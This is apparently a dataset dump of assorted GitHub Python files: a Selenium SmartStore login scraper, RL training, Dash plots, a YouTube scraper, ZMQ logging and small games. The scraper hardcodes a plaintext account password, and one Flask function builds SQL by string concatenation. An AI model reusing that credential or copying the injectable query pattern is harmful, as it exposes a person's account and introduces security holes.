seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
20869179523 | from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
smartstorelogin_url = 'https://nid.naver.com/nidlogin.login?url=https%3A%2F%2Fsell.smartstore.naver.com%2F%23%2FnaverLoginCallback%3Furl%3Dhttps%253A%252F%252Fsell.smartstore.naver.com%252F%2523'
smartstoredelevery_url = 'https://sell.smartstore.naver.com/#/naverpay/sale/delivery?summaryInfoType=DELIVERY_READY'
smartstore_id = 'hdh5454'
smartstore_pw = 'whdmsehgud8*'
driver = webdriver.Chrome('chromedriver')
#스마트스토어 로그인
driver.get(smartstorelogin_url)
driver.find_element_by_name('id').send_keys(smartstore_id)
driver.find_element_by_name('pw').send_keys(smartstore_pw)
driver.find_element_by_id('log.login').click()
#스마트스토어 배송준비 접속
driver.get(smartstoredelevery_url)
wait = WebDriverWait(driver, 10)
element = wait.until(EC.element_to_be_clickable((By.TAG_NAME, 'iframe')))
# iframes = driver.find_elements_by_tag_name('iframe')
# print('현재 페이지에 iframe은 %d개가 있습니다.' % len(iframes))
driver.switch_to.frame('__naverpay') #iframe으로 갖힌 xpath를 읽기위해서 프레임 변경
orderNo = driver.find_elements_by_xpath('//*[@data-column-name="orderNo"]/div')[1:]
orderMemberName = driver.find_elements_by_xpath('//*[@data-column-name="orderMemberName"]/div')
receiverName = driver.find_elements_by_xpath('//*[@data-column-name="receiverName"]/div')
print(orderNo[0].text)
print(orderMemberName[0].text)
print(receiverName[0].text)
# print(driver.find_element_by_xpath('//*[@data-column-name="orderMemberName"]/div/text()').extract_first())
| hdh4545/SSAutomation | findxpath.py | findxpath.py | py | 1,724 | python | en | code | 0 | github-code | 36 |
27792793140 | import random
import os
from model import *
from world import *
import numpy as np
import torch
import matplotlib.pyplot as plt
from datetime import datetime
mem, nomem, mem_vd, nomem_vd = [False, False, False, False]
mem = True
env_title = 'Tunl Mem'
if mem or nomem:
ld = 40
elif mem_vd or nomem_vd:
len_delays = [20, 40, 60]
len_delays_p = [1, 1, 1]
ld = max(len_delays)
len_edge = 7
rwd = 100
inc_rwd = -20
step_rwd = -0.1
poke_rwd = 5
rng_seed = 1234
if mem:
env = Tunl(ld, len_edge, rwd, inc_rwd, step_rwd, poke_rwd, rng_seed)
elif nomem:
env = Tunl_nomem(ld, len_edge, rwd, step_rwd, poke_rwd, rng_seed)
elif mem_vd:
env = Tunl_vd(len_delays, len_delays_p, len_edge, rwd, inc_rwd, step_rwd, poke_rwd, rng_seed)
elif nomem_vd:
env = Tunl_nomem_vd(len_delays, len_delays_p, len_edge, rwd, step_rwd, poke_rwd, rng_seed)
n_neurons = 512
lr = 1e-5
batch_size = 1
rfsize = 2
padding = 0
stride = 1
dilation = 1
conv_1_features = 16
conv_2_features = 32
hidden_types = ['conv', 'pool', 'conv', 'pool', 'lstm', 'linear']
net_title = hidden_types[4]
l2_reg = False
n_total_episodes = 50000
window_size = 5000 # for plotting
# Define conv & pool layer sizes
layer_1_out_h, layer_1_out_w = conv_output(env.h, env.w, padding, dilation, rfsize, stride)
layer_2_out_h, layer_2_out_w = conv_output(layer_1_out_h, layer_1_out_w, padding, dilation, rfsize, stride)
layer_3_out_h, layer_3_out_w = conv_output(layer_2_out_h, layer_2_out_w, padding, dilation, rfsize, stride)
layer_4_out_h, layer_4_out_w = conv_output(layer_3_out_h, layer_3_out_w, padding, dilation, rfsize, stride)
# Initializes network
net = AC_Net(
input_dimensions=(env.h, env.w, 3), # input dim
action_dimensions=6, # action dim
hidden_types=hidden_types, # hidden types
hidden_dimensions=[
(layer_1_out_h, layer_1_out_w, conv_1_features), # conv
(layer_2_out_h, layer_2_out_w, conv_1_features), # pool
(layer_3_out_h, layer_3_out_w, conv_2_features), # conv
(layer_4_out_h, layer_4_out_w, conv_2_features), # pool
n_neurons,
n_neurons], # hidden_dims
batch_size=batch_size,
rfsize=rfsize,
padding=padding,
stride=stride)
# If load pre-trained network
'''
load_dir = '2021_03_07_21_58_43_7_10_1e-05/net.pt'
parent_dir = '/home/mila/l/lindongy/tunl2d/data'
net.load_state_dict(torch.load(os.path.join(parent_dir, load_dir)))
'''
# Initializes optimizer
optimizer = torch.optim.Adam(net.parameters(), lr=lr)
# Define helper functions
def bin_rewards(epi_rewards, window_size):
"""
Average the epi_rewards with a moving window.
"""
epi_rewards = epi_rewards.astype(np.float32)
avg_rewards = np.zeros_like(epi_rewards)
for i_episode in range(1, len(epi_rewards)+1):
if 1 < i_episode < window_size:
avg_rewards[i_episode-1] = np.mean(epi_rewards[:i_episode])
elif window_size <= i_episode <= len(epi_rewards):
avg_rewards[i_episode-1] = np.mean(epi_rewards[i_episode - window_size: i_episode])
return avg_rewards
def ideal_nav_rwd(env, len_edge, len_delay, step_rwd, poke_rwd):
"""
Given env, len_edge, len_delay, step_rwd, poke_rwd, return the ideal navigation reward for a single episode.
Use after env.reset().
"""
ideal_nav_reward = (env.dist_to_init + 3 * (len_edge - 1) - min(
(len_delay, len_edge - 1))) * step_rwd + 3 * poke_rwd
return ideal_nav_reward
# Train and record
# Initialize arrays for recording
if mem_vd or nomem_vd:
len_delay = np.zeros(n_total_episodes, dtype=np.int8) # length of delay for each trial
if mem or mem_vd:
ct = np.zeros(n_total_episodes, dtype=np.int8) # whether it's a correction trial or not
stim = np.zeros((n_total_episodes, 2), dtype=np.int8)
epi_nav_reward = np.zeros(n_total_episodes, dtype=np.float16)
correct_perc = np.zeros(n_total_episodes, dtype=np.float16)
choice = np.zeros((n_total_episodes, 2), dtype=np.int8) # record the location when done
delay_loc = np.zeros((n_total_episodes, ld, 2), dtype=np.int16) # location during delay
delay_resp_hx = np.zeros((n_total_episodes, ld, n_neurons), dtype=np.float32) # hidden states during delay
delay_resp_cx = np.zeros((n_total_episodes, ld, n_neurons), dtype=np.float32) # cell states during delay
ideal_nav_rwds = np.zeros(n_total_episodes, dtype=np.float16)
for i_episode in range(n_total_episodes):
done = False
env.reset()
ideal_nav_rwds[i_episode] = ideal_nav_rwd(env, len_edge, env.len_delay, step_rwd, poke_rwd)
net.reinit_hid()
stim[i_episode] = env.sample_loc
if mem or mem_vd:
ct[i_episode] = int(env.correction_trial)
if mem_vd or nomem_vd:
len_delay[i_episode] = env.len_delay # For vd or it only
while not done:
pol, val = net.forward(
torch.unsqueeze(torch.Tensor(np.reshape(env.observation, (3, env.h, env.w))), dim=0).float()
) # forward
if env.indelay: # record location and neural responses
delay_loc[i_episode, env.delay_t - 1, :] = np.asarray(env.current_loc)
delay_resp_hx[i_episode, env.delay_t - 1, :] = net.hx[
hidden_types.index("lstm")].clone().detach().cpu().numpy().squeeze()
delay_resp_cx[i_episode, env.delay_t - 1, :] = net.cx[
hidden_types.index("lstm")].clone().detach().cpu().numpy().squeeze()
act, p, v = select_action(net, pol, val)
new_obs, reward, done, info = env.step(act)
net.rewards.append(reward)
choice[i_episode] = env.current_loc
if env.reward == rwd:
correct_perc[i_episode] = 1
epi_nav_reward[i_episode] = env.nav_reward
p_loss, v_loss = finish_trial(net, 0.99, optimizer)
avg_nav_rewards = bin_rewards(epi_nav_reward, window_size)
correct_perc = bin_rewards(correct_perc, window_size)
# Make directory to save data and figures
directory = datetime.now().strftime("%Y_%m_%d_%H_%M_%S") + f"_{env_title}_{net_title}"
parent_dir = '/home/mila/l/lindongy/tunl2d/data'
path = os.path.join(parent_dir, directory)
os.mkdir(path)
fig, (ax1, ax2) = plt.subplots(nrows=2, ncols=1, sharex=True, figsize=(6, 6))
fig.suptitle(env_title)
ax1.plot(np.arange(n_total_episodes), avg_nav_rewards, label=net_title)
ax1.plot(np.arange(n_total_episodes), ideal_nav_rwds, label="Ideal navig reward")
ax1.set_xlabel('episode')
ax1.set_ylabel('navigation reward')
ax1.legend()
ax2.plot(np.arange(n_total_episodes), correct_perc, label=net_title)
ax2.set_xlabel('episode')
ax2.set_ylabel('correct %')
ax2.legend()
# plt.show()
fig.savefig(path+'/fig.png')
# save data
if mem:
np.savez_compressed(path + '/data.npz', stim=stim, choice=choice, ct=ct, delay_loc=delay_loc,
delay_resp_hx=delay_resp_hx,
delay_resp_cx=delay_resp_cx)
elif nomem:
np.savez_compressed(path + '/data.npz', stim=stim, choice=choice, delay_loc=delay_loc, delay_resp_hx=delay_resp_hx,
delay_resp_cx=delay_resp_cx)
elif mem_vd:
np.savez_compressed(path + '/data.npz', stim=stim, choice=choice, ct=ct, len_delay=len_delay, delay_loc=delay_loc,
delay_resp_hx=delay_resp_hx, delay_resp_cx=delay_resp_cx)
elif nomem_vd:
np.savez_compressed(path + '/data.npz', stim=stim, choice=choice, len_delay=len_delay, delay_loc=delay_loc,
delay_resp_hx=delay_resp_hx, delay_resp_cx=delay_resp_cx)
# save net
torch.save(net.state_dict(), path+'/net.pt')
| dongyanl1n/sim-tunl | run.py | run.py | py | 7,488 | python | en | code | 2 | github-code | 36 |
73988252904 | known_user = ["elice", "bob", "don", "mond", "Malcom", "rees", "dewy","francis"]
while True:
print("Hi! My name is Shakib")
name = input("What is your name? :").strip().capitalize()
if name in known_user:
print("Hello{}!".format(name))
remove = input("Would like to remove from the system (y\n)?: ").strip().lower()
if remove =="y":
known_user.remove(name)
elif remove =="n":
print("No problem!,I will not do that")
else:
print("i don't think i have your name in the list {}: ".format(name))
add_me = input("would you like to be added in the system (y\n)?: ").strip().lower()
if add_me =="y":
known_user.append(name)
print(known_user)
elif add_me =="n":
print("okay {}!, see you next time: ".format(name))
| Mobinulalamfaisal/travis-project | travis_project.py | travis_project.py | py | 928 | python | en | code | 0 | github-code | 36 |
44207415083 | import simplejson as json
import datetime
def postReports(vo):
from app import db, session
try:
print('post report')
print(vo[0:10])
# SQL запросы
session['sql_raw_reports_post'] = "insert into forecast.forecast_report_dates (report_date, forecast_date) values (date('" + session['today'] + "'), date('" + vo[0:10] + "'))"
print(session['sql_raw_reports_post'])
#END --------- SQL запросы
#
r = db.session.execute(session['sql_raw_reports_post'])
db.session.commit()
return 'success'
except Exception as e:
# e holds description of the error
error_text = "<p>The error:<br>" + str(e) + "</p>"
hed = '<h1>Something is broken.</h1>'
return hed + error_text | vizalerd/ifc | server/components/postReports.py | postReports.py | py | 832 | python | en | code | 0 | github-code | 36 |
19525909188 | from sqlalchemy.orm import Session
from fastapi import APIRouter, Depends, status
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
import random
import time
def scroll(driver):
try:
last_page_height = driver.execute_script("return document.documentElement.scrollHeight")
while True:
pause_time = random.uniform(1, 2)
driver.execute_script("window.scrollTo(0, document.documentElement.scrollHeight);")
time.sleep(pause_time)
driver.execute_script("window.scrollTo(0, document.documentElement.scrollHeight-50)")
time.sleep(pause_time)
new_page_height = driver.execute_script("return document.documentElement.scrollHeight")
if new_page_height == last_page_height:
print("스크롤 완료")
break
else:
last_page_height = new_page_height
except Exception as e:
print("에러 발생: ", e)
def scrape_youtube_results(keyword):
service = Service(ChromeDriverManager(driver_version="111.0.5563.64").install())
chrome_options = Options()
chrome_options.add_argument("--headless")
try:
driver = webdriver.Chrome(service=service, options=chrome_options)
except ValueError as e:
raise ValueError(f"웹드라이버 에러 발생! : {e}")
SEARCH_KEYWORD = keyword.replace(' ', '+')
URL = "https://www.youtube.com/results?search_query=" + SEARCH_KEYWORD
driver.get(URL)
# scroll(driver)
WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, 'ytd-video-renderer')))
html_source = driver.page_source
soup_source = BeautifulSoup(html_source, 'html.parser')
content_total = soup_source.find_all(class_='yt-simple-endpoint style-scope ytd-video-renderer')
content_total_title = list(map(lambda data: data.get_text().replace("\n", ""), content_total))
content_total_link = list(map(lambda data: "https://youtube.com" + data["href"], content_total))
# content_record_src = soup_source.find_all(class_='nline-metadata-item style-scope ytd-video-meta-block')
# # content_record_src = soup_source.find_all(class_='shortViewCountText')
# content_view_cnt = [content_record_src[i].get_text().replace('조회수 ', '') for i in range(5, len(content_record_src), 10)]
# content_upload_date = [content_record_src[i].get_text() for i in range(6, len(content_record_src), 10)]
# content_view_cnt = [content_record_src[i].get_text() for i in content_record_src]
# content_upload_date = [content_record_src[i].get_text().replace('\n', '') for i in range(6, len(content_record_src), 10)]
driver.quit()
return {
'title': content_total_title,
'link': content_total_link,
# 'view': content_view_cnt,
# 'upload_date': content_upload_date
}
youtube_video = APIRouter(prefix="/youtube", tags=["유튜브"])
@youtube_video.get(
"",
status_code=status.HTTP_200_OK,
summary="유튜브 스크래핑",
description="좋아요 수, 조회수, 영상 링크, 영상 제목 스크래핑",
)
def get_video(keyword: str):
results = scrape_youtube_results(keyword)
return results | GeumBinLee/test | youtube/router.py | router.py | py | 3,630 | python | en | code | 0 | github-code | 36 |
8567341457 | import numpy as np
import pandas as pd
from scipy.stats import norm
from sklearn.preprocessing import MinMaxScaler
from dash import ALL
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from contents.app import *
@app.callback(
Output('var-plot-sliders-container', 'children'),
Input('var-plot-sliders', 'value'),
State('the-data', 'data'),
)
def render_var_plot_sliders(sliders, data):
if sliders and data:
df = pd.DataFrame.from_dict(data)
children = []
for slider in sliders:
if slider == 'index':
min = df.index.min()
max = df.index.max()
else:
min = df[slider].min()
max = df[slider].max()
children.append(html.Div([
html.B(slider, style={'margin-top': '5px', 'white-space': 'nowrap'}),
html.Div(style={'margin-top': '5px'}),
html.Div([
dcc.RangeSlider(
id={'type': 'var-plot-slider', 'index': slider},
min=min,
max=max,
value=[min, max],
marks=None,
tooltip={'always_visible': False, 'placement': 'bottom'},
)
], style={'width': '100%', 'margin-top': '10px'})
], style={'display': 'flex'}))
return children
return []
@app.callback(
Output('var-plot-container', 'children'),
Input('var-plot-type', 'value'),
Input('var-plot-scale-data', 'on'),
Input('var-plot-sliders', 'value'),
Input({'type': 'var-plot-slider', 'index': ALL}, 'value'),
State('the-data', 'data')
)
def render_var_plot(plot_type, scale_data, feature_filters, filter_ranges, data):
if plot_type and data:
df = pd.DataFrame.from_dict(data)
if feature_filters and filter_ranges:
for feature, range in zip(feature_filters, filter_ranges):
if feature == 'index': df = df[(df.index >= range[0]) & (df.index <= range[1])]
else: df = df[(df[feature] >= range[0]) & (df[feature] <= range[1])]
if scale_data: df = normalize_df(df)
if plot_type == 'box':
return [
dcc.Graph(
figure={
'data': [go.Box(y=df[col], name=col, boxpoints='outliers') for col in df.columns],
'layout': go.Layout(
title='Feature Box Plot',
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
font=dict(color='#FFFFFF'),
xaxis=dict(showgrid=False),
yaxis=dict(showgrid=False),
),
}
),
]
elif plot_type == 'violin':
return [
dcc.Graph(
figure={
'data': [go.Violin(y=df[col], name=col, points='outliers', meanline_visible=True) for col in df.columns],
'layout': go.Layout(
title='Feature Violin Plot',
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
font=dict(color='#FFFFFF'),
xaxis=dict(showgrid=False),
yaxis=dict(showgrid=False),
),
}
),
]
return []
@app.callback(
Output('dist-plot-sliders-container', 'children'),
Input('dist-plot-sliders', 'value'),
State('the-data', 'data'),
)
def render_dist_plot_sliders(sliders, data):
if sliders and data:
df = pd.DataFrame.from_dict(data)
children = []
for slider in sliders:
if slider == 'index':
min = df.index.min()
max = df.index.max()
else:
min = df[slider].min()
max = df[slider].max()
children.append(html.Div([
html.B(slider, style={'margin-top': '5px', 'white-space': 'nowrap'}),
html.Div(style={'margin-top': '5px'}),
html.Div([
dcc.RangeSlider(
id={'type': 'dist-plot-slider', 'index': slider},
min=min,
max=max,
value=[min, max],
marks=None,
tooltip={'always_visible': False, 'placement': 'bottom'},
)
], style={'width': '100%', 'margin-top': '10px'})
], style={'display': 'flex'}))
return children
return []
@app.callback(
Output('dist-plot-container', 'children'),
Input('dist-plot-scale-data', 'on'),
Input('dist-plot-feature', 'value'),
Input('dist-plot-distributions', 'value'),
Input('dist-plot-sliders', 'value'),
Input({'type': 'dist-plot-slider', 'index': ALL}, 'value'),
State('the-data', 'data'),
)
def render_dist_plot(scale_data, feature, distributions, feature_filters, filter_ranges, data):
if feature and distributions and data:
df = pd.DataFrame.from_dict(data)
if feature_filters and filter_ranges:
for feature, range in zip(feature_filters, filter_ranges):
if feature == 'index': df = df[(df.index >= range[0]) & (df.index <= range[1])]
else: df = df[(df[feature] >= range[0]) & (df[feature] <= range[1])]
if scale_data: df = normalize_df(df)
graph = dcc.Graph(
figure=go.Figure(
layout=go.Layout(
title='Empirical vs Theoretical Distributions',
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
font=dict(color='#FFFFFF'),
xaxis=dict(
title=feature,
titlefont=dict(color='#FFFFFF'),
showgrid=False,
),
yaxis=dict(
title='Density',
titlefont=dict(color='#FFFFFF'),
showgrid=False,
),
)
)
)
graph.figure.add_trace(
go.Histogram(
x=df[feature],
name=feature,
histnorm='probability density',
marker=dict(color='#37699b'),
)
)
for dist in distributions:
if dist == 'normal':
mu, std = norm.fit(df[feature])
x = np.linspace(min(df[feature]), max(df[feature]), 100)
p = norm.pdf(x, mu, std)
graph.figure.add_trace(
go.Scatter(
x=x,
y=p,
mode='lines',
name='Normal',
)
)
elif dist == 'lognormal':
pass
return graph
return []
# Helper Methods
def normalize_df(df):
""" Normalize a dataframe with MinMaxScaler (Keep the column names) """
cols = df.columns
df = pd.DataFrame(MinMaxScaler().fit_transform(df))
df.columns = cols
return df | ThomasHuggett/Quant-Toolkit-main | contents/_analysis_tools/distributions.py | distributions.py | py | 7,532 | python | en | code | 0 | github-code | 36 |
38807167453 | #%% [markdown]
# We need to create bar charts for our fancy plot to show the fraction of stuff from
# each region. We'll do that here.
#%%
group_ids_to_plot = [0, 431, 88, 299, 9]
#%%
from ltcaesar import read_data_from_file
import numpy as np
import matplotlib.pyplot as plt
#%%
# Setup our favourite stylesheet
plt.style.use("mnras_flatiron")
#%%
directory = "s50j7kAHF"
data = read_data_from_file(f"{directory}/lt/lt_outputs.hdf5")
#%% [markdown]
# We now need to calculate three things for each halo:
# + The fraction of baryonic mass from outside the halo
# + The fraction of baryonic mass from other halos
# + The fraction of baryonic mass from our own LR
#%%
def grab(x):
return getattr(data, f"gas_{x}") + getattr(data, f"stellar_{x}")
baryonic_mass = grab("mass_in_halo")
from_outside = grab("mass_in_halo_from_outside_lagrangian")
from_other = grab("mass_in_halo_from_other_lagrangian")
from_own = grab("mass_in_halo_from_lagrangian")
#%%
ratio_own = from_own / baryonic_mass
ratio_other = from_other / baryonic_mass
ratio_outside = from_outside / baryonic_mass
#%%
import os
os.mkdir("barcharts")
#%%
# Actually make the bar charts one by one
for id in group_ids_to_plot:
fig, a = plt.subplots(figsize=(1, 1))
a.bar(
[0.5, 1.5, 2.5],
[ratio_own[id], ratio_other[id], ratio_outside[id]],
width=1.0,
color=["C0", "C1", "C2"],
)
a.set_xticks([0.5, 1.5, 2.5])
a.set_xticklabels(["Own", "Other", "Outside"])
a.set_xlim(0, 3)
a.set_ylim(0, 0.8)
fig.tight_layout()
fig.savefig("barcharts/group_{}.pdf".format(id))
#%%
| JBorrow/lagrangian-transfer-paper | figures/plotgen/create_bar_charts_fancy.py | create_bar_charts_fancy.py | py | 1,612 | python | en | code | 1 | github-code | 36 |
1842938709 | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, SelectField
from wtforms.validators import DataRequired
from wtforms import ValidationError
class MyEmailValidation(object):
def __init__(self, message=None):
if not message:
message = "Email isn't valid."
self.message = message
def __call__(self, form, field):
if "@" not in field.data:
raise ValidationError(self.message)
class CreateUsersForm(FlaskForm):
email = StringField("Destination email", validators=[DataRequired(), MyEmailValidation()])
role_selector = SelectField(
"Select role for new user",
choices=[("admin", 3), ("moderator", 4), ("operator", 5)]
)
submit = SubmitField("Create user")
| a-yarohovich/control-panel | core/app/create_users/forms.py | forms.py | py | 773 | python | en | code | 0 | github-code | 36 |
8597208595 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 3 16:57:23 2022
@author: manthanprasad
"""
list1 = [25, -42, 31, 0, -85, 69]
for num in list1:
if num >= 0:
print(num, end = " ") | Manthan-prasad/MyCaptainAssaignmets-python- | PositiveNumbersInRange.py | PositiveNumbersInRange.py | py | 226 | python | en | code | 0 | github-code | 36 |
38732705628 | import time
def task_duration(start_time: float, end_time: float) -> None:
"""
Calculates the duration of a task given the start and end times.
Parameters:
start_time (float): The start time of the task in seconds.
end_time (float): The end time of the task in seconds.
Returns:
None: The function does not return anything. It prints the formatted duration of the task.
"""
elapsed_time = end_time - start_time
hours = int(elapsed_time // 3600)
minutes = int((elapsed_time % 3600) // 60)
seconds = round(elapsed_time % 60, 2)
if hours > 0:
seconds = int(seconds)
formatted_time = f"{hours:02d}:{minutes:02d}:{seconds:02d}"
elif minutes > 0:
seconds = int(seconds)
formatted_time = f"{minutes:02d}:{seconds:02d}"
else:
formatted_time = f"{seconds} seconds"
print(100 * '-')
print("Task took:", formatted_time)
print(100 * '-')
| IgMann/MLOps-MNIST-project | Deployment/task_duration.py | task_duration.py | py | 952 | python | en | code | 0 | github-code | 36 |
25547162312 | from operator import itemgetter, attrgetter
class Student:
def __init__(self, name, grade, age):
self.name = name
self.grade = grade
self.age = age
def __repr__(self):
return repr((self.name, self.grade, self.age))
def t_sorted():
print(sorted([5, 2, 3, 1, 4]))
a = [5, 2, 3, 1, 4]
a.sort()
print(a)
# dict 中重复key会被覆盖
print(sorted({1: 'D', 4: 'B', 3: 'B', 2: 'E', 5: 'A'}))
print(sorted("This is a test string from Andrew".split(), key=str.lower))
student_tuples = [
('john', 'A', 15),
('jane', 'B', 12),
('dave', 'B', 10),
]
print(sorted(student_tuples, key=lambda student: student[2]))
print(sorted(student_tuples, key=itemgetter(2)))
# 支持多个排序
print(sorted(student_tuples, key=itemgetter(1,2)))
student_objects = [
Student('john', 'A', 15),
Student('jane', 'B', 12),
Student('dave', 'B', 10),
]
print(sorted(student_objects, key=lambda student: student.age))
print(sorted(student_objects, key=attrgetter('age')))
print(sorted(student_objects, key=attrgetter('grade', 'age')))
if __name__ == '__main__':
t_sorted()
| cool8sniper/coolpython | coolpthon/others/sorted_t.py | sorted_t.py | py | 1,225 | python | en | code | 1 | github-code | 36 |
34837660944 | from IPython.display import clear_output
def basic_info():
print("Welcome to Tic Tac Toe Board Game.")
choice = "Wrong"
choice1 = 'Wrong'
while choice != 'Y':
user1 = input("Please Your Name as User 1: ")
choice = input(f"Your Name is {user1}, Correct? Y or N: ").upper()
while choice1 != 'Y':
user2 = input("Please Your Name as User 2: ")
choice1 = input(f"Your Name is {user2}, Correct? Y or N: ").upper()
return [user1,user2]
def board_pattern():
board_1 = ["1","2","3"]
#board_2 = ["-","-","-","-","-"]
board_3 = ["4","5","6"]
#board_4 = ["-","-","-","-","-"]
board_5 = ["7","8","9"]
borad = [board_1,board_3,board_5]
return borad
def playing():
board = board_pattern()
count = 0
clear_output()
while count < 9:
varis = input("Select position and mark. (format: posi,mark) ")
posi,mark = varis.split(',')
posi = int(posi)
if posi <= 3: # use to replace the board 1 row
board[0][posi-1] = mark
elif posi <= 6:# use to replace the board 2 row
posi = posi - 3
board[1][posi-1] = mark
elif posi <= 9:# use to replace the board 3 row
posi = posi - 6
board[2][posi-1] = mark
for new_board in board:
print(new_board)
if board[0][0] == board[0][1] == board[0][2] == mark: # these line that following can be use a better method to do it
return True, mark
elif board[1][0] == board[1][1] == board[1][2] == mark:
return True, mark
elif board[2][0] == board[2][1] == board[2][2] == mark:
return True, mark
elif board[0][0] == board[1][0] == board[2][0] == mark:
return True, mark
elif board[0][1] == board[1][1] == board[2][1] == mark:
return True, mark
elif board[0][2] == board[1][2] == board[2][2] == mark:
return True, mark
elif board[0][0] == board[1][1] == board[2][2] == mark:
return True, mark
elif board[0][2] == board[1][1] == board[2][0] == mark:
return True, mark
count += 1
return False, mark
def interact():
user1,user2 = basic_info() #grab the basic info of users, return uesr1 and user2
hashmap = {user1:'X',user2:'O'}
for board in board_pattern():# print origenal board
print(board)
continues_game = input('Do you want to continue the game? Y or N ').upper()
if continues_game == 'Y':
print(f"First user will always go first, and {user1} uses X and {user2} uses O")
status,mark = playing()
if status == True:
print(f'{list(hashmap.keys())[list(hashmap.values()).index(mark)]} is the winner') # This line to use value to get key
else:
print('Game is tied. No winner.')
elif continues_game == 'N':
print('Closing Game.')
interact() | aajmlao/Notes-for-learning-Python | project1.py | project1.py | py | 2,942 | python | en | code | 0 | github-code | 36 |
5784044260 | import atexit
import logging.config
import logging.handlers
import os
import tempfile
import zmq
import slivka
_context = zmq.Context()
atexit.register(_context.destroy, 0)
class ZMQQueueHandler(logging.handlers.QueueHandler):
def __init__(self, address, ctx: zmq.Context = None):
ctx = ctx or _context
socket = ctx.socket(zmq.PUSH)
socket.connect(address)
super().__init__(socket)
def emit(self, record):
message = self.format(record)
msg = record.__dict__.copy()
msg.update(
message=message,
msg=message,
args=None,
exc_info=None,
exc_text=None
)
self.queue.send_json(msg)
class ZMQQueueListener(logging.handlers.QueueListener):
def __init__(self, address, handlers=(), ctx: zmq.Context = None):
self._address = address
ctx = ctx or _context
self._ctx = ctx
socket = ctx.socket(zmq.PULL)
socket.bind(address)
super().__init__(socket, *handlers, respect_handler_level=False)
self.handlers = list(self.handlers)
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
self.cleanup()
def add_handler(self, handler):
self.handlers.append(handler)
def remove_handler(self, handler):
self.handlers.remove(handler)
def dequeue(self, block):
msg = self.queue.recv_json()
if msg == self._sentinel:
self.queue.close(0)
return msg
else:
return logging.makeLogRecord(msg)
def enqueue_sentinel(self):
socket = self._ctx.socket(zmq.PUSH)
socket.connect(self._address)
socket.send_json(self._sentinel)
def stop(self):
super().stop()
self.queue.close(0)
def cleanup(self):
if self._address.startswith('ipc://'):
os.unlink(self._address[6:])
def get_logging_sock():
from hashlib import md5
from base64 import b64encode
home = slivka.conf.settings.directory.home
suffix = b64encode(md5(home.encode()).digest()[:6], b'-_').decode()
tmp = tempfile.gettempdir()
path = 'ipc://%s/slivka-logging-%s.sock' % (tmp, suffix)
return path
def _get_default_logging_config():
return {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'full': {
'format': "%(asctime)s %(levelname)-10s %(name)s %(message)s",
'datefmt': "%d/%m/%y %H:%M:%S"
},
'minimal': {
'format': '%(levelname)s %(message)s'
}
},
'handlers': {
'slivka.logging_queue': {
'class': 'slivka.conf.logging.ZMQQueueHandler',
'formatter': 'full',
'level': 'DEBUG',
'address': get_logging_sock()
},
'console': {
'class': 'logging.StreamHandler',
'formatter': 'minimal',
'level': 'DEBUG'
}
},
'loggers': {
'slivka': {
'level': 'DEBUG',
'propagate': False,
'handlers': ['slivka.logging_queue', 'console']
}
}
}
def configure_logging(config=None):
config = config or _get_default_logging_config()
logging.config.dictConfig(config)
| bartongroup/slivka | slivka/conf/logging.py | logging.py | py | 3,460 | python | en | code | 7 | github-code | 36 |
22782452778 | #
# @lc app=leetcode id=110 lang=python3
#
# [110] Balanced Binary Tree
#
# https://leetcode.com/problems/balanced-binary-tree/description/
#
# algorithms
# Easy (44.61%)
# Likes: 3301
# Dislikes: 217
# Total Accepted: 550.2K
# Total Submissions: 1.2M
# Testcase Example: '[3,9,20,null,null,15,7]'
#
# Given a binary tree, determine if it is height-balanced.
#
# For this problem, a height-balanced binary tree is defined as:
#
#
# a binary tree in which the left and right subtrees of every node differ in
# height by no more than 1.
#
#
#
# Example 1:
#
#
# Input: root = [3,9,20,null,null,15,7]
# Output: true
#
#
# Example 2:
#
#
# Input: root = [1,2,2,3,3,null,null,4,4]
# Output: false
#
#
# Example 3:
#
#
# Input: root = []
# Output: true
#
#
#
# Constraints:
#
#
# The number of nodes in the tree is in the range [0, 5000].
# -10^4 <= Node.val <= 10^4
#
#
#
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def isBalanced(self, root: TreeNode) -> bool:
is_balance, _ = self._check(root)
return is_balance
def _check(self, root):
"""
@params: root
@return: is_balance, subtree_height
"""
if not root:
return True, 0
if root.left:
is_balance_left, left_height = self._check(root.left)
else:
is_balance_left, left_height = True, 0
if root.right:
is_balance_right, right_height = self._check(root.right)
else:
is_balance_right, right_height = True, 0
# is either subtree is not balanced
if not is_balance_left or not is_balance_right:
return False, 0
# if height diff is greater than 1
if abs(left_height - right_height) > 1:
return False, 0
return True, max(left_height, right_height) + 1
# @lc code=end
| Zhenye-Na/leetcode | python/110.balanced-binary-tree.py | 110.balanced-binary-tree.py | py | 2,045 | python | en | code | 17 | github-code | 36 |
1194624429 | """
Definitions of the GA4GH protocol types.
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import inspect
from sys import modules
import google.protobuf.json_format as json_format
import google.protobuf.message as message
import google.protobuf.struct_pb2 as struct_pb2
import ga4gh.pb as pb
